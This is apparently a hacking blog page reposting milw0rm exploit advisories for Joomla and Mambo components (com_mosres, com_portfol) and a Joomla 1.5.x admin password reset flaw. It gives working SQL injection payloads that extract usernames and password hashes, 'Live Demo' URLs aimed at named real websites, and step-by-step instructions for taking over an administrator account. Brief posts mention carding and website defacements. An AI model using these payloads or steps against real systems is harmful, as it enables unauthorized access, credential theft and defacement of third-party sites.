Joomla Component com_mosres

Posted on 10.39 by CS-31

==================================================================================
Joomla Component com_mosres (property_uid) SQL injection Vulnerability
==================================================================================



###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com

###################################################

Conditions : magic_quotes_gpc = Off
---------------------------------------------------
Example Joomla:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

Live Demo:
http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

---------------------------------------------------
Example Mambo:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

Live Demo:
http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

**************************
however, still looking ... component, can be injected in several places (not all or always).
Almost always SQL injection & also blind sql injection.
I let you work ;)

http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2+union%20select%201,concat(username,0x3a,password)+from+jos_users/*&lang=bg

**************************


+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++




Mos Res
23/02/2005
Vince Wooll
This component is released under the GNU/GPL License
mosres@woollyinwales.co.uk
http://www.mosres.net
1.0f
Mambo Resident component for v4.5.2

# milw0rm.com [2009-06-03]

The Carding

Posted on 09.11 by CS-31

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}

// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));

< ---- {3}

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0

AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]

Portfol (com_portfol)

Posted on 08.49 by CS-31

[~] ScriptName: "Joomla"
[~] Component: "Portfol (com_portfol)"
[~] Version: "1.2"
[~] Date: "20.10.2006"
[~] Author: "mivaco"
[~] Author E-mail: "ivan@mivaco.com"
[~] Author URL: "www.mivaco.com"

[~] DORK: com_portfol

Exploit:
Code:
:
/index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)Quick_5ilv3r+from+jos_users--

live:
:
http://hentama.co.id/home/index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)donny+from+jos_users--

Depes lagi for Mas roy

Posted on 11.59 by CS-31


ada lagi hacker yang mendepes website memberikan pernyataan kepada roy suryo
beh2